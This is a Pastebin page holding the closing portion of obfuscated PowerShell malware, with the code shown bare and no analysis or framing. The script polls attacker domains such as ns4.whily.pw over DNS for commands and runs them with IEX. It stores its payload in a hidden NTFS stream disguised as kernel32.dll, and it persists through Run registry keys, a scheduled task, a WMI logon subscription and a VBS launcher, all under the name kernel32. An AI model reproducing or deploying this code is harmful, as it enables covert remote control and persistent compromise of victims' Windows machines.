  337.      {
  338.  
  339.        if ($AuthNS -ne $null -AND $AuthNS -ne 0)
  340.  
  341.        {
  342.  
  343.          ${/==\__/\_/\_/=\_/} = ____/==\/\/\/===== "$commanddomain.${script:_/\__/=\/\/\/\/=\}" $AuthNS
  344.  
  345.        }
  346.  
  347.        else
  348.  
  349.        {
  350.  
  351.          ${/==\__/\_/\_/=\_/} = ____/==\/\/\/===== "$commanddomain.${script:_/\__/=\/\/\/\/=\}"
  352.  
  353.        }
  354.  
  355.        ${___/=======\_/\__} = ${/==\__/\_/\_/=\_/} | Out-String
  356.  
  357.        if(${___/=======\_/\__} -ne "" -And ${__/\_/\/=\/=\/=\/} -ne ${___/=======\_/\__})
  358.  
  359.        {
  360.  
  361.          ${__/=\/\_/\__/===\} = IEX ${___/=======\_/\__}
  362.  
  363.          ${__/\_/\/=\/=\/=\/} = ${___/=======\_/\__}
  364.  
  365.        }
  366.  
  367.        ${__/=\/\_/\__/===\}
  368.  
  369.        ${_/\/\/\__/=\_/\/=}++
  370.  
  371.        sleep -Seconds $(Get-Random -Minimum 50 -Maximum 70)        
  372.  
  373.      }
  374.  
  375.      if(${/==\/===\/==\___/} -eq $StopString)
  376.  
  377.      {
  378.  
  379.        break;
  380.  
  381.      }
  382.  
  383.    }
  384.  
  385.  }
  386.  
  387.  Catch
  388.  
  389.  {
  390.  
  391.  }
  392.  
  393.  finally
  394.  
  395.  {  
  396.  
  397.    exit;
  398.  
  399.  }
  400.  
  401. }
  402.  
  403.  
  404.  
  405. ')))
  406.  ${/==\_/========\/=} = $env:programdata+$('\Windows'))
  407.  ${___/===\/==\_/\/\} = $('kernel32.dll'))
  408.  ${/==\/=\_/\/\/\/==} = $('kernel32.vbs'))
  409.  ${_/\_/==\___/==\__} = "${/==\_/========\/=}`:${/==\/=\_/\/\/\/==}"
  410.  if(${_/===\/\/=\/\___/=} -eq $True)
  411.  { ${_/\/\_/\/\_/===\_} = "logic ${______/\/\/=====\/} ${_/=====\/\__/=\/\/} ${_/===\_/\/=\_/\/\/} ${____/=\_/\_/\_/===} ${__/==\/\/\____/===}"
  412.  ${__/\/\_/\_/\/\/\_} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
  413.  if(${__/\/\_/\_/\/\/\_}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
  414.  { ${_/\___/\_/=\/\_/=} = $('HKLM:Software\Microsoft\Windows\CurrentVersion'))
  415.  ${_/\__/=\_/\/==\__} = $('HKLM:Software\Microsoft\Windows\CurrentVersion\Run\'))
  416.  }
  417.  else
  418.  { ${_/\___/\_/=\/\_/=} = $('HKCU:Software\Microsoft\Windows'))
  419.  ${_/\__/=\_/\/==\__} = $('HKCU:Software\Microsoft\Windows\CurrentVersion\Run\'))
  420.  }
  421.  ${_/=\_/\_/=\_/=\__} = [convert]::ToInt32($($PSVersionTable.PSVersion.Major|Out-String).Trim())
  422.  if(${_/=\_/\_/=\_/=\__} -gt 2)
  423.  { sc -Path ${/==\_/========\/=} -Value ${/=\/=\/==\/=\_/==} -Stream ${___/===\/==\_/\/\}
  424.  ac -Path ${/==\_/========\/=} -Value ${_/\/\_/\/\_/===\_} -Stream ${___/===\/==\_/\/\}
  425.  }
  426.  else
  427.  { ${__/==\/\_____/\/\} = ${/=\/=\/==\/=\_/==} + "`n" + ${_/\/\_/\/\_/===\_}
  428.  ${/=\/=\____/\_/\__} = ____/=\/==\/\/\_/=(${__/==\/\_____/\/\})
  429.  New-ItemProperty -Path ${_/\___/\_/=\/\_/=} -Name kernel32 -PropertyType String -Value ${/=\/=\____/\_/\__} -force
  430.  }
  431.  ${__/\/\_/\_/\/\/\_} = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
  432.  if(${__/\/\_/\_/\/\/\_}.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
  433.  { ${/==\/=\_/===\/=\/}=$('kernel32_Filter'));
  434.  ${_/====\_/=\_/\_/\}=$('kernel32_consumer'));
  435.  gwmi __eventFilter -namespace root\subscription | Remove-WmiObject
  436.  gwmi CommandLineEventConsumer -Namespace root\subscription | Remove-WmiObject
  437.  gwmi __filtertoconsumerbinding -Namespace root\subscription | Remove-WmiObject
  438.  ${_/==\_/=\___/\_/=} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class __EventFilter -Arguments @{Name = ${/==\/=\_/===\/=\/}; EventNamespace = $('root\CIMV2')); QueryLanguage = $('WQL')); Query = $('Select * from __InstanceCreationEvent within 30 where targetInstance isa 'Win32_LogonSession''))}
  439.  ${/=\/\/\_/\/=\/==\} = ""
  440.  if(${_/=\_/\_/=\_/=\__} -gt 2)
  441.  {  ${___/=\__/\/\/=\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class CommandLineEventConsumer -Arguments @{Name = ${_/====\_/=\_/\_/\}; ExecutablePath = $('C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe')); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"IEX `$(Get-Content -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\}|Out-String)`""}
  442.    ${/=\/\/\_/\/=\/==\} = "IEX `$(Get-Content -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\}|out-string)"
  443.    ${__/\__/=\__/=\/=\} = "IEX `$(gc -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\} ^|Out-String)`""
  444.    ${_/\/\/\_/\/=\/=\_} = [System.Text.Encoding]::Unicode.GetBytes(${__/\__/=\__/=\/=\})
  445.    ${/==\______/===\__} = [Convert]::ToBase64String(${_/\/\/\_/\/=\/=\_})
  446.    schtasks.exe /F /create /tn kernel32 /tr "powershell.exe -WindowStyle Hidden -e ${/==\______/===\__}" /sc onidle /i 30
  447.   }
  448.   else
  449.   {  ${/==\/=\/==\/\/\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).kernel32);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
  450.    ${/=\___/\_/=\/\/=\} = [System.Text.Encoding]::Unicode.GetBytes(${/==\/=\/==\/\/\/=})
  451.    New-ItemProperty -Path ${_/\___/\_/=\/\_/=} -Name Part -PropertyType String -Value ${/==\/=\/==\/\/\/=} -force
  452.    ${/=\/\/\_/\/=\/==\} = "IEX `$((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).Part)"
  453.    ${___/=\__/\/\/=\_/} = Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class CommandLineEventConsumer -Arguments @{Name = ${_/====\_/=\_/\_/\}; ExecutablePath = $('C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe')); CommandLineTemplate = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/=\/\/\_/\/=\/==\}`""}
  454.    schtasks.exe /F /create /tn kernel32 /tr "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -C `"${/=\/\/\_/\/=\/==\}`"" /sc onidle /i 30
  455.   }
  456.   Set-WmiInstance -Computername $env:COMPUTERNAME -Namespace $('root\subscription')) -Class __FilterToConsumerBinding -Arguments @{Filter = ${_/==\_/=\___/\_/=}; Consumer = ${___/=\__/\/\/=\_/}} | out-null
  457.   if(${_/==\/\__/==\__/\/}){  IEX ${/=\/\/\_/\/=\/==\};
  458.   }
  459.   }
  460.   else
  461.   { if(${_/=\_/\_/=\_/=\__} -gt 2)
  462.   {  ${/=\/\/\_/\/=\/==\} = "IEX (Get-Content -Path ${/==\_/========\/=} -Stream ${___/===\/==\_/\/\}|Out-String)"
  463.    IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${_/\_/==\___/==\__}`""
  464.    IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/=\/\/\_/\/=\/==\}`"`",0 >> ${_/\_/==\___/==\__}`""
  465.    New-ItemProperty -Path ${_/\__/=\_/\/==\__} -Name kernel32 -PropertyType String -Value "wscript ${_/\_/==\___/==\__}" -force
  466.    schtasks.exe /F /create /tn kernel32 /tr "C:\Windows\System32\wscript.exe ${_/\_/==\___/==\__}" /sc onidle /i 30
  467.   }
  468.   else
  469.   {  ${/==\/=\/==\/\/\/=} = "`$d = [System.Convert]::FromBase64String((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).kernel32);`$ms = New-Object System.IO.MemoryStream;`$ms.Write(`$d, 0, `$d.Length);`$ms.Seek(0,0) | Out-Null;`$cs = New-Object System.IO.Compression.GZipStream(`$ms, [System.IO.Compression.CompressionMode]::Decompress);`$sr = New-Object System.IO.StreamReader(`$cs);`$t = `$sr.readtoend();IEX `$t"
  470.    ${/=\___/\_/=\/\/=\} = [System.Text.Encoding]::Unicode.GetBytes(${/==\/=\/==\/\/\/=})
  471.    New-ItemProperty -Path ${_/\___/\_/=\/\_/=} -Name Part -PropertyType String -Value ${/==\/=\/==\/\/\/=} -force
  472.    ${/=\/\/\_/\/=\/==\} = "IEX ((Get-ItemProperty -Path ${_/\___/\_/=\/\_/=}).Part)"
  473.    IEX "cmd /c `"echo Set objShell = CreateObject(`"`"Wscript.shell`"`") > ${_/\_/==\___/==\__}`""
  474.    IEX "cmd /c `"echo objShell.run `"`"powershell -WindowStyle Hidden -executionpolicy bypass -C ${/=\/\/\_/\/=\/==\}`"`",0 >> ${_/\_/==\___/==\__}`""
  475.    New-ItemProperty -Path ${_/\__/=\_/\/==\__} -Name kernel32 -PropertyType String -Value "wscript ${_/\_/==\___/==\__}" -force
  476.    schtasks.exe /F /create /tn kernel32 /tr "C:\Windows\System32\wscript.exe ${_/\_/==\___/==\__}" /sc onidle /i 30
  477.   }
  478.   if(${_/==\/\__/==\__/\/}){IEX "wscript ${_/\_/==\___/==\__}";}
  479.   }
  480.   }
  481.   else
  482.   { ${_/\/\_/\/\_/===\_} = "logic ${______/\/\/=====\/} ${_/=====\/\__/=\/\/} ${_/===\_/\/=\_/\/\/} ${____/=\_/\_/\_/===} ${__/==\/\/\____/===}"
  483.   IEX "${/=\/=\/==\/=\_/==} `n ${_/\/\_/\/\_/===\_}"
  484.   }}
  485.  _/===\_/\_/====\/\ $('www')) $('www')) $('mail')) $('stop')) -_/===\/\/=\/\___/= -_/==\/\__/==\__/\/
  486.  _/===\_/\_/====\/\ $('ns4.whily.pw')) "vv" $('e.whily.pw')) $('stop')) -_/===\/\/=\/\___/= -_/==\/\__/==\__/\/
  487.  ');$ms=New-Object System.IO.MemoryStream;$ms.Write($data,0,$data.Length);$ms.Seek(0,0)|Out-Null;$cs = New-Object System.IO.Compression.GZipStream($ms,[System.IO.Compression.CompressionMode]::Decompress);$sr=New-Object System.IO.StreamReader($cs);$t=$sr.readtoend();IEX $t;"
RAW Paste Data
Pastebin PRO Summer Special!
Get 60% OFF on Pastebin PRO accounts!
Top